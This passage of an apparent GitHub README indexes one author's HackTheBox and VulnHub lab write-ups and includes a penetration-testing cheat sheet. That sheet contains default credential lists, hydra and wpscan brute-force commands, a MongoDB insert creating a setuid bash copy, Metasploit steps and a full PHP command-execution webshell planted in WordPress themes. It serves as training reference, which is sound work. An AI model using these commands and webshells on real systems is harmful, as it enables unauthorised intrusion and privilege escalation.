| 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) |
| 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) |
| 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) |
| 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) |
| 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) |
| 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
| 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
| 18. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) |
| 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) |
| 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) |
| 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) |
| 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) |
| 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) |
| 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) |
| 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) |
| 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) |
| 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) |
| 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) |
| 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) |
| 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) |
<a name="ttps"></a>
## ☢️ TTPs [↟](#contents)
<a name="enumerate"></a>
### ⚙️ Enumerate [🡑](#ttps)
<a name="enumerate_app_apache"></a>
#### enumerate_app_apache [⇡](#enumerate)
```shell
use directory traversal to checkout the config file:
/usr/local/etc/apache22/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
useful when certain config changes block enumeration
```
---
<a name="enumerate_app_apache_tomcat"></a>
#### enumerate_app_apache_tomcat [⇡](#enumerate)
```shell
tomcat manager default creds:
tomcat:tomcat
admin:admin
admin:password
user:password
tomcat:s3cret
```
[+] https://0xrick.github.io/hack-the-box/jerry/
---
<a name="enumerate_app_coldfusion_files"></a>
#### enumerate_app_coldfusion_files [⇡](#enumerate)
look for available sub directories and files on a coldfusion install
```shell
dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt
```
[+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
---
<a name="enumerate_app_coldfusion_version"></a>
#### enumerate_app_coldfusion_version [⇡](#enumerate)
find out the coldfusion install version
```shell
http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl
```
[+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42)
---
<a name="enumerate_app_drupal"></a>
#### enumerate_app_drupal [⇡](#enumerate)
```shell
version:
http://<targetip>:<targetport>/CHANGELOG.txt
bruteforce:
ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V
scan:
/opt/droopescan/droopescan scan drupal -u http://<targetip>
```
[+] https://zayotic.com/posts/oscp-reference/
---
<a name="enumerate_app_joomla"></a>
#### enumerate_app_joomla [⇡](#enumerate)
```shell
joomscan --url http://<targetip>
```
[+] https://zayotic.com/posts/oscp-reference/
---
<a name="enumerate_app_mongo"></a>
#### enumerate_app_mongo [⇡](#enumerate)
```shell
mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler
use scheduler => switch db
db.getCollectionNames() => list all collections/tables
db.tasks.find({}) => show all entries from collection/table
db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks
```
---
<a name="enumerate_app_nodejs"></a>
#### enumerate_app_nodejs [⇡](#enumerate)
```shell
check source and look at the js files to find interesting links/apis
use burp to spider and create a sitemap of the website
find app.js and look for db credentials (sql/mongo)
try ssh using db credentials
```
---
<a name="enumerate_app_pfsense"></a>
#### enumerate_app_pfsense [⇡](#enumerate)
```shell
default credentials: admin/pfsense
```
---
<a name="enumerate_app_phpmyadmin"></a>
#### enumerate_app_phpmyadmin [⇡](#enumerate)
```shell
default credentials:
admin/
admin/admin
root/root
root/password
root/mysql
```
---
<a name="enumerate_app_powershell_history"></a>
#### enumerate_app_powershell_history [⇡](#enumerate)
For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information.
```shell
type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="enumerate_app_prtg"></a>
#### enumerate_app_prtg [⇡](#enumerate)
```shell
default credentials:
prtgadmin/prtgadmin
configuration and backup files (accessed via an open ftp/smb):
c:\programdata\paessler\Configuration.dat
c:\programdata\paessler\Configuration.old
```
---
<a name="enumerate_app_unrealirc"></a>
#### enumerate_app_unrealirc [⇡](#enumerate)
```shell
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost <targetip>
set rport <targetport>
exploit
```
[+] https://snowscan.io/htb-writeup-irked/
---
<a name="enumerate_app_webmin"></a>
#### enumerate_app_webmin [⇡](#enumerate)
```shell
view any file - even root owned, run perl cgi scripts
msf: auxiliary/admin/webmin/file_disclosure
can view /etc/ldap.secret file that might give credentials
can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell
download shadow file and try cracking hashes
download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i"
```
---
<a name="enumerate_app_wordpress"></a>
#### enumerate_app_wordpress [⇡](#enumerate)
```shell
default creds: admin/password
look for phpmyadmin, plugins directories
look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh
enumerate authors:
http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>"
http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid
wpuser http://192.168.92.134/ usernames
wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m
bruteforce wordpress login:
wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot
wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john
wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR"
wordpress to shell:
#1 add webshell via /wp-admin/theme-editor.php?file=404.php
a. "Appearance" -> "Editor"
b. select "404 Template" (404.php)
c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File"
d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php
e. run local netcat listener
f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99
#2 add webshell @ /wp-admin/
a. "Appearance" -> "Editor"
b. select "Theme Footer" (footer.php)
c. add php backdoor at the end of file and click "Update File"
d. example php backdoor:
<!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
exec($cmd, $results);
foreach( $results as $r )
{
echo $r."<br/>";
}
echo "</pre>";
die;
}
?>
/*Usage: http://domain/path?cmd=cat+/etc/passwd*/
e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands
f. result will be concatenated to the end of the page
#3 add webshell via media file @ /wp-admin/plugin-install.php
a. "Upload plugin" -> "Browse"
b. example php backdoor:
<!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
exec($cmd, $results);
foreach( $results as $r )
{
echo $r."<br/>";
}
echo "</pre>";
die;
}
?>
/*Usage: http://domain/path?cmd=cat+/etc/passwd*/
c. plugin install might fail, but php file will be uploaded as a media file
d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload
e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands
#4 metasploit:
msf> use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169
msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress
msf exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
extract hashes from wp mysql db and crack via john:
select concat_ws(':', user_login, user_pass) from wp_users;
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
